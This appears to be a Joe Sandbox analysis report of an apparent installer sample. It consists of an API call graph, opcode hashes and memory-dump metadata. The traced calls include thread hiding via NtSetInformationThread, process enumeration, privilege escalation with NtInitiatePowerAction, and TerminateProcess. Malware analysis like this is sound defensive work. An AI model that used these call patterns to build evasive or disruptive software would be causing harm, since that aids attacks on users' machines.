API calls 63668->63671 63669 6cabc7a5 63670 6cc3a133 std::_Facet_Register 4 API calls 63669->63670 63679 6cabc753 _Yarn _strlen 63670->63679 63671->63679 63672->63541 63672->63668 63672->63669 63672->63679 63673 6cabd3ed 63675 6cc3a133 std::_Facet_Register 4 API calls 63673->63675 63674 6cabd406 63676 6cc3a133 std::_Facet_Register 4 API calls 63674->63676 63677 6cabd39a _Yarn 63675->63677 63676->63677 63678 6cc39050 104 API calls 63677->63678 63680 6cabd458 std::ios_base::_Ios_base_dtor _strlen 63678->63680 63679->63558 63679->63673 63679->63674 63679->63677 63685 6cabcb2f 63679->63685 63680->63541 63681 6cabd8bb 63680->63681 63682 6cabd8a4 63680->63682 63686 6cabd852 _Yarn _strlen 63680->63686 63684 6cc3a133 std::_Facet_Register 4 API calls 63681->63684 63683 6cc3a133 std::_Facet_Register 4 API calls 63682->63683 63683->63686 63684->63686 63686->63558 63687 6cabdccf 63686->63687 63688 6cabdcb6 63686->63688 63691 6cabdc69 _Yarn 63686->63691 63690 6cc3a133 std::_Facet_Register 4 API calls 63687->63690 63689 6cc3a133 std::_Facet_Register 4 API calls 63688->63689 63689->63691 63690->63691 63692 6cc39050 104 API calls 63691->63692 63694 6cabdd1c std::ios_base::_Ios_base_dtor 63692->63694 63693 6cc386e0 4 API calls 63693->63623 63694->63541 63694->63693 63697 6cc3a138 63695->63697 63696 6cc3a152 63696->63539 63697->63696 63700 6cc3a154 std::_Facet_Register 63697->63700 63804 6cc42704 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63697->63804 63699 6cc3afb3 std::_Facet_Register 63808 6cc3ca69 RaiseException 63699->63808 63700->63699 63805 6cc3ca69 RaiseException 63700->63805 63702 6cc3b7ac IsProcessorFeaturePresent 63708 6cc3b7d1 63702->63708 63704 6cc3af73 63806 6cc3ca69 RaiseException 63704->63806 63706 6cc3af93 std::invalid_argument::invalid_argument 63807 6cc3ca69 RaiseException 63706->63807 63708->63539 63710 6cc2e0a6 FindFirstFileA 63709->63710 63711 6cc2e0a4 63709->63711 63712 6cc2e0e0 63710->63712 63711->63710 63713 6cc2e13c 63712->63713 63714 
6cc2e0e2 FindClose 63712->63714 63713->63545 63714->63712 63717 6cc38846 63715->63717 63716 6cc388be OpenServiceA 63716->63717 63717->63716 63718 6cc38922 63717->63718 63718->63589 63720 6cc20893 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63719->63720 63721 6cc24e71 CloseHandle 63720->63721 63722 6cac37cb 63720->63722 63723 6cc23bd1 CloseHandle 63720->63723 63725 6cc0cea0 WriteFile ReadFile WriteFile WriteFile 63720->63725 63809 6cc0c390 63720->63809 63721->63720 63726 6cc39450 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63722->63726 63723->63720 63725->63720 63726->63556 63728 6cad6bd5 63727->63728 63820 6cb02020 63728->63820 63730 6cad6c68 63731 6cc3a133 std::_Facet_Register 4 API calls 63730->63731 63732 6cad6ca0 63731->63732 63837 6cc3aa17 63732->63837 63734 6cad6cb4 63849 6cb01d90 63734->63849 63737 6cad6d8e 63737->63601 63739 6cad6dc8 63857 6cb026e0 24 API calls 4 library calls 63739->63857 63741 6cad6dda 63858 6cc3ca69 RaiseException 63741->63858 63743 6cad6def 63859 6cafe010 67 API calls 63743->63859 63745 6cad6e0f 63745->63601 63747 6cad6e9f 63746->63747 63750 6cad6eb3 63747->63750 64249 6cb03560 32 API calls std::_Xinvalid_argument 63747->64249 63753 6cad6f5b 63750->63753 64251 6cb02250 30 API calls 63750->64251 64252 6cb026e0 24 API calls 4 library calls 63750->64252 64253 6cc3ca69 RaiseException 63750->64253 63752 6cad6f6e 63752->63601 63753->63752 64250 6cb037e0 32 API calls std::_Xinvalid_argument 63753->64250 63757 6cad709e 63756->63757 63761 6cad70d1 63756->63761 64254 6cb001f0 63757->64254 63759 6cad7183 63759->63589 63761->63759 64258 6cb02250 30 API calls 63761->64258 63762 6cc44208 67 API calls 63762->63761 63764 6cad71ae 64259 6cb02340 24 API calls 63764->64259 63766 6cad71be 64260 6cc3ca69 RaiseException 63766->64260 63768 6cad71c9 63769->63589 63770->63584 63772 6cc38770 63771->63772 63773 6cc387b0 WaitForSingleObject CloseHandle CloseHandle 63772->63773 63774 6cc387a4 
63772->63774 63773->63772 63774->63593 63775->63605 63777 6cc390a7 63776->63777 64306 6cc396e0 63777->64306 63779 6cc390b8 63780 6cad6ba0 104 API calls 63779->63780 63784 6cc390dc 63780->63784 63782 6cc3918f std::ios_base::_Ios_base_dtor 64359 6cafe010 67 API calls 63782->64359 63786 6cc39144 63784->63786 63792 6cc39157 63784->63792 64325 6cc39a30 63784->64325 64333 6cb13010 63784->64333 64343 6cc39280 63786->64343 63787 6cc391d2 std::ios_base::_Ios_base_dtor 63787->63644 63790 6cc3914c 63791 6cad7090 77 API calls 63790->63791 63791->63792 64358 6cafe010 67 API calls 63792->64358 63793->63635 63799 6cc38966 std::locale::_Setgloballocale 63794->63799 63795 6cc38a64 Process32NextW 63795->63799 63796 6cc38a14 CloseHandle 63796->63799 63797 6cc38a45 Process32FirstW 63797->63799 63798 6cc38a96 63798->63564 63799->63795 63799->63796 63799->63797 63799->63798 63800->63581 63801->63601 63803->63563 63804->63697 63805->63704 63806->63706 63807->63699 63808->63702 63810 6cc0c3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 63809->63810 63811 6cc0ce3c 63810->63811 63812 6cc0cab9 CreateFileA 63810->63812 63814 6cc0b4d0 63810->63814 63811->63720 63812->63810 63816 6cc0b4e3 __wsopen_s std::locale::_Setgloballocale 63814->63816 63815 6cc0c206 WriteFile 63815->63816 63816->63815 63817 6cc0c377 63816->63817 63818 6cc0b619 WriteFile 63816->63818 63819 6cc0bc23 ReadFile 63816->63819 63817->63810 63818->63816 63819->63816 63821 6cc3a133 std::_Facet_Register 4 API calls 63820->63821 63822 6cb0207e 63821->63822 63823 6cc3aa17 43 API calls 63822->63823 63824 6cb02092 63823->63824 63860 6cb02f60 42 API calls 4 library calls 63824->63860 63826 6cb020c8 63827 6cb0210d 63826->63827 63828 6cb02136 63826->63828 63829 6cb02120 63827->63829 63861 6cc3a67e 9 API calls 2 library calls 63827->63861 63862 6cb02250 30 API calls 63828->63862 63829->63730 63832 6cb0215b 63863 6cb02340 24 API calls 63832->63863 63834 6cb02171 63864 6cc3ca69 RaiseException 63834->63864 63836 6cb0217c 63836->63730 63838 
6cc3aa23 __EH_prolog3 63837->63838 63865 6cc3a5a5 63838->63865 63843 6cc3aa41 63879 6cc3aaaa 39 API calls std::locale::_Setgloballocale 63843->63879 63844 6cc3aa9c 63844->63734 63846 6cc3aa49 63880 6cc3a8a1 HeapFree GetLastError _Yarn ___std_exception_destroy 63846->63880 63848 6cc3aa5f 63871 6cc3a5d6 63848->63871 63850 6cad6d5d 63849->63850 63851 6cb01ddc 63849->63851 63850->63737 63856 6cb02250 30 API calls 63850->63856 63885 6cc3ab37 63851->63885 63855 6cb01e82 63856->63739 63857->63741 63858->63743 63859->63745 63860->63826 63861->63829 63862->63832 63863->63834 63864->63836 63866 6cc3a5b4 63865->63866 63867 6cc3a5bb 63865->63867 63881 6cc43abd 6 API calls std::_Lockit::_Lockit 63866->63881 63868 6cc3a5b9 63867->63868 63882 6cc3bc7b EnterCriticalSection 63867->63882 63868->63848 63878 6cc3a920 6 API calls 2 library calls 63868->63878 63872 6cc3a5e0 63871->63872 63873 6cc43acb 63871->63873 63877 6cc3a5f3 63872->63877 63883 6cc3bc89 LeaveCriticalSection 63872->63883 63884 6cc43aa6 LeaveCriticalSection 63873->63884 63876 6cc43ad2 63876->63844 63877->63844 63878->63843 63879->63846 63880->63848 63881->63868 63882->63868 63883->63877 63884->63876 63886 6cc3ab40 63885->63886 63887 6cb01dea 63886->63887 63894 6cc4343a 63886->63894 63887->63850 63893 6cc3fc53 18 API calls __cftoe 63887->63893 63889 6cc3ab8c 63889->63887 63905 6cc43148 65 API calls 63889->63905 63891 6cc3aba7 63891->63887 63906 6cc44208 63891->63906 63893->63855 63895 6cc43445 __wsopen_s 63894->63895 63896 6cc43458 63895->63896 63897 6cc43478 63895->63897 63931 6cc43810 18 API calls __cftoe 63896->63931 63901 6cc43468 63897->63901 63917 6cc4e4fc 63897->63917 63901->63889 63905->63891 63907 6cc44214 __wsopen_s 63906->63907 63908 6cc44233 63907->63908 63909 6cc4421e 63907->63909 63914 6cc4422e 63908->63914 64112 6cc3fc99 EnterCriticalSection 63908->64112 64127 6cc43810 18 API calls __cftoe 63909->64127 63911 6cc44250 64113 6cc4428c 63911->64113 63914->63887 63915 6cc4425b 64128 6cc44282 
LeaveCriticalSection 63915->64128 63918 6cc4e508 __wsopen_s 63917->63918 63933 6cc43a8f EnterCriticalSection 63918->63933 63920 6cc4e516 63934 6cc4e5a0 63920->63934 63925 6cc4e662 63926 6cc4e781 63925->63926 63958 6cc4e804 63926->63958 63929 6cc434bc 63932 6cc434e5 LeaveCriticalSection 63929->63932 63931->63901 63932->63901 63933->63920 63935 6cc4e5c3 63934->63935 63936 6cc4e61b 63935->63936 63943 6cc4e523 63935->63943 63951 6cc3fc99 EnterCriticalSection 63935->63951 63952 6cc3fcad LeaveCriticalSection 63935->63952 63953 6cc4a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63936->63953 63938 6cc4e624 63954 6cc47eab HeapFree GetLastError _free 63938->63954 63941 6cc4e62d 63941->63943 63955 6cc4a30f 6 API calls std::_Lockit::_Lockit 63941->63955 63948 6cc4e55c 63943->63948 63944 6cc4e64c 63956 6cc3fc99 EnterCriticalSection 63944->63956 63947 6cc4e65f 63947->63943 63957 6cc43aa6 LeaveCriticalSection 63948->63957 63950 6cc43493 63950->63901 63950->63925 63951->63935 63952->63935 63953->63938 63954->63941 63955->63944 63956->63947 63957->63950 63959 6cc4e823 63958->63959 63960 6cc4e836 63959->63960 63965 6cc4e84b 63959->63965 63974 6cc43810 18 API calls __cftoe 63960->63974 63962 6cc4e797 63962->63929 63971 6cc576ce 63962->63971 63963 6cc4e96b 63963->63962 63978 6cc43810 18 API calls __cftoe 63963->63978 63965->63963 63975 6cc57598 37 API calls __cftoe 63965->63975 63967 6cc4e9bb 63967->63963 63976 6cc57598 37 API calls __cftoe 63967->63976 63969 6cc4e9d9 63969->63963 63977 6cc57598 37 API calls __cftoe 63969->63977 63979 6cc57a86 63971->63979 63974->63962 63975->63967 63976->63969 63977->63963 63978->63962 63981 6cc57a92 __wsopen_s 63979->63981 63980 6cc57a99 63997 6cc43810 18 API calls __cftoe 63980->63997 63981->63980 63982 6cc57ac4 63981->63982 63988 6cc576ee 63982->63988 63987 6cc576e9 63987->63929 63999 6cc43dbb 63988->63999 63993 6cc57724 63996 6cc57756 63993->63996 64039 6cc47eab HeapFree GetLastError _free 63993->64039 
63998 6cc57b1b LeaveCriticalSection __wsopen_s 63996->63998 63997->63987 63998->63987 64040 6cc3f3db 63999->64040 64002 6cc43ddf 64004 6cc3f4e6 64002->64004 64049 6cc3f53e 64004->64049 64006 6cc3f4fe 64006->63993 64007 6cc5775c 64006->64007 64064 6cc57bdc 64007->64064 64013 6cc57882 GetFileType 64016 6cc578d4 64013->64016 64017 6cc5788d GetLastError 64013->64017 64014 6cc5778e __dosmaperr 64014->63993 64015 6cc57857 GetLastError 64015->64014 64094 6cc54ea0 SetStdHandle __dosmaperr __wsopen_s 64016->64094 64093 6cc430e2 __dosmaperr _free 64017->64093 64018 6cc57805 64018->64013 64018->64015 64092 6cc57b47 CreateFileW 64018->64092 64021 6cc5789b CloseHandle 64021->64014 64036 6cc578c4 64021->64036 64023 6cc5784a 64023->64013 64023->64015 64024 6cc578f5 64025 6cc57941 64024->64025 64095 6cc57d56 70 API calls 2 library calls 64024->64095 64030 6cc57948 64025->64030 64109 6cc57e00 70 API calls 2 library calls 64025->64109 64028 6cc57976 64029 6cc57984 64028->64029 64028->64030 64029->64014 64032 6cc57a00 CloseHandle 64029->64032 64096 6cc4f015 64030->64096 64110 6cc57b47 CreateFileW 64032->64110 64034 6cc57a2b 64035 6cc57a35 GetLastError 64034->64035 64034->64036 64037 6cc57a41 __dosmaperr 64035->64037 64036->64014 64111 6cc54e0f SetStdHandle __dosmaperr __wsopen_s 64037->64111 64039->63996 64041 6cc3f3fb 64040->64041 64042 6cc3f3f2 64040->64042 64041->64042 64043 6cc480a2 __Getctype 37 API calls 64041->64043 64042->64002 64048 6cc4a0c5 5 API calls std::_Lockit::_Lockit 64042->64048 64044 6cc3f41b 64043->64044 64045 6cc48618 __Getctype 37 API calls 64044->64045 64046 6cc3f431 64045->64046 64047 6cc48645 __cftoe 37 API calls 64046->64047 64047->64042 64048->64002 64050 6cc3f566 64049->64050 64051 6cc3f54c 64049->64051 64053 6cc3f56d 64050->64053 64054 6cc3f58c 64050->64054 64052 6cc3f4cc __wsopen_s HeapFree GetLastError 64051->64052 64058 6cc3f556 __dosmaperr 64052->64058 64056 6cc3f48d __wsopen_s HeapFree GetLastError 64053->64056 64053->64058 64055 6cc47f33 __fassign 
MultiByteToWideChar 64054->64055 64059 6cc3f59b 64055->64059 64056->64058 64057 6cc3f5a2 GetLastError 64057->64058 64058->64006 64059->64057 64060 6cc3f5c8 64059->64060 64061 6cc3f48d __wsopen_s HeapFree GetLastError 64059->64061 64060->64058 64062 6cc47f33 __fassign MultiByteToWideChar 64060->64062 64061->64060 64063 6cc3f5df 64062->64063 64063->64057 64063->64058 64065 6cc57c17 64064->64065 64067 6cc57bfd 64064->64067 64066 6cc57b6c __wsopen_s 18 API calls 64065->64066 64071 6cc57c4f 64066->64071 64067->64065 64068 6cc43810 __cftoe 18 API calls 64067->64068 64068->64065 64069 6cc57c7e 64070 6cc59001 __wsopen_s 18 API calls 64069->64070 64075 6cc57779 64069->64075 64072 6cc57ccc 64070->64072 64071->64069 64074 6cc43810 __cftoe 18 API calls 64071->64074 64073 6cc57d49 64072->64073 64072->64075 64076 6cc4383d __Getctype 11 API calls 64073->64076 64074->64069 64075->64014 64078 6cc54cfc 64075->64078 64077 6cc57d55 64076->64077 64079 6cc54d08 __wsopen_s 64078->64079 64080 6cc43a8f std::_Lockit::_Lockit EnterCriticalSection 64079->64080 64081 6cc54d0f 64080->64081 64082 6cc54d34 64081->64082 64087 6cc54da3 EnterCriticalSection 64081->64087 64089 6cc54d56 64081->64089 64084 6cc54f32 __wsopen_s 11 API calls 64082->64084 64083 6cc54e06 __wsopen_s LeaveCriticalSection 64085 6cc54d76 64083->64085 64086 6cc54d39 64084->64086 64085->64014 64091 6cc57b47 CreateFileW 64085->64091 64088 6cc55080 __wsopen_s EnterCriticalSection 64086->64088 64086->64089 64087->64089 64090 6cc54db0 LeaveCriticalSection 64087->64090 64088->64089 64089->64083 64090->64081 64091->64018 64092->64023 64093->64021 64094->64024 64095->64025 64097 6cc54c92 __wsopen_s 18 API calls 64096->64097 64100 6cc4f025 64097->64100 64098 6cc4f02b 64099 6cc54e0f __wsopen_s SetStdHandle 64098->64099 64107 6cc4f083 __dosmaperr 64099->64107 64100->64098 64101 6cc54c92 __wsopen_s 18 API calls 64100->64101 64108 6cc4f05d 64100->64108 64104 6cc4f054 64101->64104 64102 6cc54c92 __wsopen_s 18 API calls 64103 6cc4f069 
CloseHandle 64102->64103 64103->64098 64105 6cc4f075 GetLastError 64103->64105 64106 6cc54c92 __wsopen_s 18 API calls 64104->64106 64105->64098 64106->64108 64107->64014 64108->64098 64108->64102 64109->64028 64110->64034 64111->64036 64112->63911 64114 6cc442ae 64113->64114 64115 6cc44299 64113->64115 64119 6cc442a9 64114->64119 64129 6cc443a9 64114->64129 64151 6cc43810 18 API calls __cftoe 64115->64151 64119->63915 64123 6cc442d1 64144 6cc4ef88 64123->64144 64125 6cc442d7 64125->64119 64152 6cc47eab HeapFree GetLastError _free 64125->64152 64127->63914 64128->63914 64130 6cc443c1 64129->64130 64134 6cc442c3 64129->64134 64131 6cc4d350 18 API calls 64130->64131 64130->64134 64132 6cc443df 64131->64132 64153 6cc4f25c 64132->64153 64135 6cc4be2e 64134->64135 64136 6cc4be45 64135->64136 64137 6cc442cb 64135->64137 64136->64137 64236 6cc47eab HeapFree GetLastError _free 64136->64236 64139 6cc4d350 64137->64139 64140 6cc4d371 64139->64140 64141 6cc4d35c 64139->64141 64140->64123 64237 6cc43810 18 API calls __cftoe 64141->64237 64143 6cc4d36c 64143->64123 64145 6cc4efae 64144->64145 64149 6cc4ef99 __dosmaperr 64144->64149 64146 6cc4efd5 64145->64146 64148 6cc4eff7 __dosmaperr 64145->64148 64238 6cc4f0b1 64146->64238 64246 6cc43810 18 API calls __cftoe 64148->64246 64149->64125 64151->64119 64152->64119 64154 6cc4f268 __wsopen_s 64153->64154 64155 6cc4f270 __dosmaperr 64154->64155 64156 6cc4f2ba 64154->64156 64158 6cc4f323 __dosmaperr 64154->64158 64155->64134 64164 6cc55080 EnterCriticalSection 64156->64164 64194 6cc43810 18 API calls __cftoe 64158->64194 64159 6cc4f2c0 64162 6cc4f2dc __dosmaperr 64159->64162 64165 6cc4f34e 64159->64165 64193 6cc4f31b LeaveCriticalSection __wsopen_s 64162->64193 64164->64159 64166 6cc4f370 64165->64166 64192 6cc4f38c __dosmaperr 64165->64192 64167 6cc4f3c4 64166->64167 64169 6cc4f374 __dosmaperr 64166->64169 64168 6cc4f3d7 64167->64168 64203 6cc4e359 20 API calls __wsopen_s 64167->64203 64195 6cc4f530 64168->64195 64202 6cc43810 18 API 
calls __cftoe 64169->64202 64174 6cc4f42c 64176 6cc4f485 WriteFile 64174->64176 64177 6cc4f440 64174->64177 64175 6cc4f3ed 64178 6cc4f416 64175->64178 64179 6cc4f3f1 64175->64179 64180 6cc4f4a9 GetLastError 64176->64180 64176->64192 64182 6cc4f475 64177->64182 64183 6cc4f44b 64177->64183 64205 6cc4f5a1 43 API calls 5 library calls 64178->64205 64179->64192 64204 6cc4f94b 6 API calls __wsopen_s 64179->64204 64180->64192 64208 6cc4f9b3 7 API calls 2 library calls 64182->64208 64184 6cc4f465 64183->64184 64185 6cc4f450 64183->64185 64207 6cc4fb77 8 API calls 3 library calls 64184->64207 64189 6cc4f455 64185->64189 64185->64192 64188 6cc4f463 64188->64192 64206 6cc4fa8e 7 API calls 2 library calls 64189->64206 64192->64162 64193->64155 64194->64155 64196 6cc550d5 __wsopen_s 18 API calls 64195->64196 64198 6cc4f541 64196->64198 64197 6cc4f3e8 64197->64174 64197->64175 64198->64197 64209 6cc480a2 GetLastError 64198->64209 64201 6cc4f57e GetConsoleMode 64201->64197 64202->64192 64203->64168 64204->64192 64205->64192 64206->64188 64207->64188 64208->64188 64210 6cc480bf 64209->64210 64211 6cc480b9 64209->64211 64212 6cc4a252 __Getctype 6 API calls 64210->64212 64216 6cc480c5 SetLastError 64210->64216 64213 6cc4a213 __Getctype 6 API calls 64211->64213 64214 6cc480dd 64212->64214 64213->64210 64215 6cc480e1 64214->64215 64214->64216 64217 6cc4a8d5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 64215->64217 64222 6cc48153 64216->64222 64223 6cc48159 64216->64223 64219 6cc480ed 64217->64219 64220 6cc480f5 64219->64220 64221 6cc4810c 64219->64221 64225 6cc4a252 __Getctype 6 API calls 64220->64225 64224 6cc4a252 __Getctype 6 API calls 64221->64224 64222->64197 64222->64201 64226 6cc441b9 __Getctype 35 API calls 64223->64226 64227 6cc48118 64224->64227 64228 6cc48103 64225->64228 64229 6cc4815e 64226->64229 64230 6cc4811c 64227->64230 64231 6cc4812d 64227->64231 64233 6cc47eab _free HeapFree GetLastError 64228->64233 64232 6cc4a252 __Getctype 6 API calls 
64230->64232 64235 6cc47eab _free HeapFree GetLastError 64231->64235 64232->64228 64234 6cc48109 64233->64234 64234->64216 64235->64234 64236->64137 64237->64143 64239 6cc4f0bd __wsopen_s 64238->64239 64247 6cc55080 EnterCriticalSection 64239->64247 64241 6cc4f0cb 64242 6cc4f015 __wsopen_s 21 API calls 64241->64242 64243 6cc4f0f8 64241->64243 64242->64243 64248 6cc4f131 LeaveCriticalSection __wsopen_s 64243->64248 64245 6cc4f11a 64245->64149 64246->64149 64247->64241 64248->64245 64249->63750 64250->63752 64251->63750 64252->63750 64253->63750 64255 6cb0022e 64254->64255 64256 6cad70c4 64255->64256 64261 6cc44ecb 64255->64261 64256->63762 64258->63764 64259->63766 64260->63768 64262 6cc44ef6 64261->64262 64263 6cc44ed9 64261->64263 64262->64255 64263->64262 64264 6cc44ee6 64263->64264 64265 6cc44efa 64263->64265 64277 6cc43810 18 API calls __cftoe 64264->64277 64269 6cc450f2 64265->64269 64270 6cc450fe __wsopen_s 64269->64270 64278 6cc3fc99 EnterCriticalSection 64270->64278 64272 6cc4510c 64279 6cc450af 64272->64279 64276 6cc44f2c 64276->64255 64277->64262 64278->64272 64287 6cc4bc96 64279->64287 64285 6cc450e9 64286 6cc45141 LeaveCriticalSection 64285->64286 64286->64276 64288 6cc4d350 18 API calls 64287->64288 64289 6cc4bca7 64288->64289 64290 6cc550d5 __wsopen_s 18 API calls 64289->64290 64292 6cc4bcad __wsopen_s 64290->64292 64291 6cc450c3 64294 6cc44f2e 64291->64294 64292->64291 64304 6cc47eab HeapFree GetLastError _free 64292->64304 64296 6cc44f40 64294->64296 64298 6cc44f5e 64294->64298 64295 6cc44f4e 64305 6cc43810 18 API calls __cftoe 64295->64305 64296->64295 64296->64298 64301 6cc44f76 _Yarn 64296->64301 64303 6cc4bd49 62 API calls 64298->64303 64299 6cc443a9 62 API calls 64299->64301 64300 6cc4d350 18 API calls 64300->64301 64301->64298 64301->64299 64301->64300 64302 6cc4f25c __wsopen_s 62 API calls 64301->64302 64302->64301 64303->64285 64304->64291 64305->64298 64307 6cc39715 64306->64307 64308 6cb02020 52 API calls 64307->64308 64309 6cc397b6 
64308->64309 64310 6cc3a133 std::_Facet_Register 4 API calls 64309->64310 64311 6cc397ee 64310->64311 64312 6cc3aa17 43 API calls 64311->64312 64313 6cc39802 64312->64313 64314 6cb01d90 89 API calls 64313->64314 64315 6cc398ab 64314->64315 64316 6cc398dc 64315->64316 64360 6cb02250 30 API calls 64315->64360 64316->63779 64318 6cc39916 64361 6cb026e0 24 API calls 4 library calls 64318->64361 64320 6cc39928 64362 6cc3ca69 RaiseException 64320->64362 64322 6cc3993d 64363 6cafe010 67 API calls 64322->64363 64324 6cc3994f 64324->63779 64326 6cc39a7d 64325->64326 64364 6cc39c90 64326->64364 64328 6cc39b6c 64328->63784 64331 6cc39a95 64331->64328 64382 6cb02250 30 API calls 64331->64382 64383 6cb026e0 24 API calls 4 library calls 64331->64383 64384 6cc3ca69 RaiseException 64331->64384 64334 6cb1304f 64333->64334 64337 6cb13063 64334->64337 64393 6cb03560 32 API calls std::_Xinvalid_argument 64334->64393 64340 6cb1311e 64337->64340 64395 6cb02250 30 API calls 64337->64395 64396 6cb026e0 24 API calls 4 library calls 64337->64396 64397 6cc3ca69 RaiseException 64337->64397 64339 6cb13131 64339->63784 64340->64339 64394 6cb037e0 32 API calls std::_Xinvalid_argument 64340->64394 64344 6cc3928e 64343->64344 64347 6cc392c1 64343->64347 64345 6cb001f0 64 API calls 64344->64345 64348 6cc392b4 64345->64348 64346 6cc39373 64346->63790 64347->64346 64398 6cb02250 30 API calls 64347->64398 64350 6cc44208 67 API calls 64348->64350 64350->64347 64351 6cc3939e 64399 6cb02340 24 API calls 64351->64399 64353 6cc393ae 64400 6cc3ca69 RaiseException 64353->64400 64355 6cc393b9 64401 6cafe010 67 API calls 64355->64401 64357 6cc39412 std::ios_base::_Ios_base_dtor 64357->63790 64358->63782 64359->63787 64360->64318 64361->64320 64362->64322 64363->64324 64365 6cc39cf8 64364->64365 64366 6cc39ccc 64364->64366 64373 6cc39d09 64365->64373 64385 6cb03560 32 API calls std::_Xinvalid_argument 64365->64385 64367 6cc39cf1 64366->64367 64387 6cb02250 30 API calls 64366->64387 64367->64331 64370 6cc39ed8 
64388 6cb02340 24 API calls 64370->64388 64372 6cc39ee7 64389 6cc3ca69 RaiseException 64372->64389 64373->64367 64386 6cb02f60 42 API calls 4 library calls 64373->64386 64377 6cc39f17 64391 6cb02340 24 API calls 64377->64391 64379 6cc39f2d 64392 6cc3ca69 RaiseException 64379->64392 64381 6cc39d43 64381->64367 64390 6cb02250 30 API calls 64381->64390 64382->64331 64383->64331 64384->64331 64385->64373 64386->64381 64387->64370 64388->64372 64389->64381 64390->64377 64391->64379 64392->64367 64393->64337 64394->64339 64395->64337 64396->64337 64397->64337 64398->64351 64399->64353 64400->64355 64401->64357 64402 6cab3d62 64404 6cab3bc0 64402->64404 64403 6cab3e8a GetCurrentThread NtSetInformationThread 64405 6cab3eea 64403->64405 64404->64403 64406 6cc4262f 64407 6cc4263b __wsopen_s 64406->64407 64408 6cc42642 GetLastError ExitThread 64407->64408 64409 6cc4264f 64407->64409 64410 6cc480a2 __Getctype 37 API calls 64409->64410 64411 6cc42654 64410->64411 64418 6cc4d456 64411->64418 64414 6cc4266b 64424 6cc4259a 16 API calls 2 library calls 64414->64424 64417 6cc4268d 64419 6cc4265f 64418->64419 64420 6cc4d468 GetPEB 64418->64420 64419->64414 64423 6cc4a45f 5 API calls std::_Lockit::_Lockit 64419->64423 64420->64419 64421 6cc4d47b 64420->64421 64425 6cc4a508 5 API calls std::_Lockit::_Lockit 64421->64425 64423->64414 64424->64417 64425->64419 64426 6cacf150 64428 6cacefbe 64426->64428 64427 6cacf243 CreateFileA 64430 6cacf2a7 64427->64430 64428->64427 64429 6cad02ca 64430->64429 64431 6cad02ac GetCurrentProcess TerminateProcess 64430->64431 64431->64429 64432 6cac3b72 64433 6cc3a133 std::_Facet_Register 4 API calls 64432->64433 64441 6cac37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 64433->64441 64434 6cc2e090 2 API calls 64434->64441 64435 6cad639e 64446 6cc43820 18 API calls 2 library calls 64435->64446 64437 6cad6ba0 104 API calls 64437->64441 64438 6cad6e60 32 API calls 64438->64441 64439 6cad7090 77 API calls 64439->64441 64441->64434 64441->64435 64441->64437 
64441->64438 64441->64439 64445 6cafe010 67 API calls 64441->64445 64445->64441 64447 6cacf8a3 64449 6cacf887 64447->64449 64448 6cad02ac GetCurrentProcess TerminateProcess 64450 6cad02ca 64448->64450 64449->64448
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: HR^
                            • API String ID: 4218353326-1341859651
                            • Opcode ID: 12686330c7401eb4cbbf17cd49379be85ce44da7b285a3c8b03c27e1c069e5a3
                            • Instruction ID: 4e6800a7e69784ddf657232650b4638c1f08da868d2b42900d2cfca7228a763d
                            • Opcode Fuzzy Hash: 12686330c7401eb4cbbf17cd49379be85ce44da7b285a3c8b03c27e1c069e5a3
                            • Instruction Fuzzy Hash: EC740671644B028FC728CF28C8D0A95B7F3EF95318B1D8A6DC0969BB55E774B58ACB40

                            Control-flow Graph
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CC3893E
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CreateSnapshotToolhelp32
                            • String ID:
                            • API String ID: 3332741929-0
                            • Opcode ID: 572525b799a9cdd96fe3d8aec142f7ae44c8467f60cac9595b6c5e54048630b2
                            • Instruction ID: e40a8544d2dbbb3b46d9016cb0adc4e9e3b98a11557514ecd3045731c57324d1
                            • Opcode Fuzzy Hash: 572525b799a9cdd96fe3d8aec142f7ae44c8467f60cac9595b6c5e54048630b2
                            • Instruction Fuzzy Hash: 5B319D70209311AFD7119F19D884B4ABBE4AF8A708F51992FF48CD6360E330D8858B53

                            Control-flow Graph
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
